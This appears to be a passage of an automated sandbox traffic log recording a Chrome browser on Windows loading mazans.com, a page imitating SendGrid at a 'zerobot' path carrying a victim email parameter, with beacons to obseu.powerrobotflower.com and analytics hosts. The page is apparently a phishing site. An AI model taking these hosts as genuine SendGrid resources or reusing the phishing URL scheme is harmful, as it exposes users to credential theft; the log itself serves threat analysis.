                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:21 UTC1834INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27 77 61 73 6d 2d 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 67 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'wasm-unsafe-eval' https://*.go
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:21 UTC1706INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          123192.168.2.17499593.219.22.304436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:21 UTC1179OUTGET /h?a=1541905715&u=6112782573225535&v=2199469863289764&s=5313631937644667&b=web&tv=4.0&z=0&h=%2FWEB-ID-6672849687924%2Fzerobot%2F&q=%3Femail%3DEMAIL_REDACTED&d=mazans.com&t=Page%20not%20found%20%7C%20SendGrid&r=https%3A%2F%2Fsepedatua.com%2F&k=Device%20screen%20resolution&k=1280%20x%201024&k=Inner%20window%20dimensions&k=1280%20x%20907&ts=1731515354042&srp=cs%3A84712%252F392b47b9-fdc5-a91a-dc6e-b9b5c392f625%252F1%252F1%252F2520&cspid=84712&cspvid=1&cssn=1&csts=2520&csuu=392b47b9-fdc5-a91a-dc6e-b9b5c392f625&ubv=117.0.5938.149&upv=10.0.0&sch=907&scw=1280&st=1731515359048&lv=4.23.4&ld=cdn.heapanalytics.com HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: heapanalytics.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:21 UTC488INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:21 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 37
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          ETag: W/"25-4iFqfptz9csCeTUceM5hwzR1zqc"
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST, PUT, GET
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:21 UTC37INData Raw: 47 49 46 38 39 61 01 00 01 00 00 00 00 21 f9 04 01 0a 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          124192.168.2.17499603.248.162.964436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:21 UTC403OUTGET /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:21 UTC268INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: undefined
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:21 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          125192.168.2.174996454.75.69.1924436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:22 UTC669OUTPOST /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 1866
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:22 UTC1866OUTData Raw: 65 3d 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 66 63 32 33 34 65 66 34 34 38 66 39 38 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 31 30 63 65 36 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 33 38 34 36 62 32 30 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 38 38 35 38 35 38 65 30 35 32 61 33 61 31 65 61 64 32 62 37 36 30 64 64 34 36 65 64 64 36 33 63 36 30 36 33 34 30 36 32 61 39 36 35 61 35 33 35 63 33 32 30 34 35 62 63 30 62 63 36 62 34 66 37 37 62 65 32 36 62 62 32 35 63 62 34 33 65 32 39 32 33 63 66 33 34 63 36 64 61 39 30 39 33 33 37 38 31 34 64 61 34 64 65 34 34 34 65 63 38 62 63 35 39 61 37 65 65 34 36
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: e=37dfbd8ee84e001269efc234ef448f989225c24f567d43d6da1908be6245cad7bd70a976710ce60ed89373bfe70e9c20c1e53e8d5913846b2017071a10acf9f29f671885858e052a3a1ead2b760dd46edd63c60634062a965a535c32045bc0bc6b4f77be26bb25cb43e2923cf34c6da909337814da4de444ec8bc59a7ee46
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:22 UTC277INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:22 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          126192.168.2.174996752.22.214.684436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:22 UTC949OUTGET /h?a=1541905715&u=6112782573225535&v=2199469863289764&s=5313631937644667&b=web&tv=4.0&z=0&h=%2FWEB-ID-6672849687924%2Fzerobot%2F&q=%3Femail%3DEMAIL_REDACTED&d=mazans.com&t=Page%20not%20found%20%7C%20SendGrid&r=https%3A%2F%2Fsepedatua.com%2F&k=Device%20screen%20resolution&k=1280%20x%201024&k=Inner%20window%20dimensions&k=1280%20x%20907&ts=1731515354042&srp=cs%3A84712%252F392b47b9-fdc5-a91a-dc6e-b9b5c392f625%252F1%252F1%252F2520&cspid=84712&cspvid=1&cssn=1&csts=2520&csuu=392b47b9-fdc5-a91a-dc6e-b9b5c392f625&ubv=117.0.5938.149&upv=10.0.0&sch=907&scw=1280&st=1731515359048&lv=4.23.4&ld=cdn.heapanalytics.com HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: heapanalytics.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:22 UTC488INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:22 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 37
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          ETag: W/"25-4iFqfptz9csCeTUceM5hwzR1zqc"
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST, PUT, GET
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:22 UTC37INData Raw: 47 49 46 38 39 61 01 00 01 00 00 00 00 21 f9 04 01 0a 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          127192.168.2.17499653.248.162.964436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:22 UTC403OUTGET /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:22 UTC268INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: undefined
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:22 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          128192.168.2.17499703.248.162.964436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:23 UTC403OUTGET /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:24 UTC268INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: undefined
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:24 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          129192.168.2.1749973162.241.85.1724436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:24 UTC2333OUTGET /content/dam/sendgrid/core-assets/social/favicon-32x32.png HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=EMAIL_REDACTED
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9; at_check=true; mbox=session#ead54cbe71824480b6163d2cf14e5e54#1731517211|PC#ead54cbe71824480b6163d2cf14e5e54.37_0#1794760151; _gcl_au=1.1.1581689275.1731515350; _gd_visitor=68a6beac-571c-486f-896d-0de3508c5af9; _gd_session=5109dfa4-7e15-4de3-89f4-70d06284fa1b; TAsessionID=57cd44ce-3945-49f8-b363-1f9e5ecbe175|NEW; notice_behavior=implied,eu; _cq_duid=1.1731515352.vVOwxXK4AgFUHCBp; _cq_suid=1.1731515352.purk0nRGidINit9L; _mkto_trk=id:294-TKB-300&token:_mch-mazans.com-1731515352683-23262; _an_uid=0; _ga_8W5LR442LD=GS1.1.1731515352.1.0.1731515352.0.0.0; _ga=GA1.1.70095159.1731515353; _rdt_uuid=1731515353676.59612d52-27d8-4d62-91ae-7a523b33ca67; _hp2_id.1541905715=%7B%22userId%22%3A%226112782573225535%22%2C%22pageviewId%22%3A%222199469863289764%22%2C%22sessionId%22%3A%225313631937644667%22%2C%22identity%22%3Anull%2C%22trackerVersion%22%3A%224.0%22%7D; _uetsid=6c20c730a1dc11ef92b555071f46574f; _uetvid=6c2123d0a1dc11ef9ad55fff4e91da09; ajs_anonymous_id=a6484a29-d020 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:24 UTC261INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:24 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 07 Sep 2022 17:01:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 583
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:24 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          130192.168.2.1749975162.241.85.1724436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:25 UTC2333OUTGET /content/dam/sendgrid/core-assets/social/favicon-96x96.png HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=EMAIL_REDACTED
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9; at_check=true; mbox=session#ead54cbe71824480b6163d2cf14e5e54#1731517211|PC#ead54cbe71824480b6163d2cf14e5e54.37_0#1794760151; _gcl_au=1.1.1581689275.1731515350; _gd_visitor=68a6beac-571c-486f-896d-0de3508c5af9; _gd_session=5109dfa4-7e15-4de3-89f4-70d06284fa1b; TAsessionID=57cd44ce-3945-49f8-b363-1f9e5ecbe175|NEW; notice_behavior=implied,eu; _cq_duid=1.1731515352.vVOwxXK4AgFUHCBp; _cq_suid=1.1731515352.purk0nRGidINit9L; _mkto_trk=id:294-TKB-300&token:_mch-mazans.com-1731515352683-23262; _an_uid=0; _ga_8W5LR442LD=GS1.1.1731515352.1.0.1731515352.0.0.0; _ga=GA1.1.70095159.1731515353; _rdt_uuid=1731515353676.59612d52-27d8-4d62-91ae-7a523b33ca67; _hp2_id.1541905715=%7B%22userId%22%3A%226112782573225535%22%2C%22pageviewId%22%3A%222199469863289764%22%2C%22sessionId%22%3A%225313631937644667%22%2C%22identity%22%3Anull%2C%22trackerVersion%22%3A%224.0%22%7D; _uetsid=6c20c730a1dc11ef92b555071f46574f; _uetvid=6c2123d0a1dc11ef9ad55fff4e91da09; ajs_anonymous_id=a6484a29-d020 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:25 UTC261INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:25 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                          Connection: Upgrade, close
